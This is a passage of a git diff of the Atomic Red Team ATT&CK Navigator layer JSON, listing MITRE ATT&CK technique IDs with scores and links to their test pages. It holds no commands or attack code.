eID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 4fd93aa6..e7753f83 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"en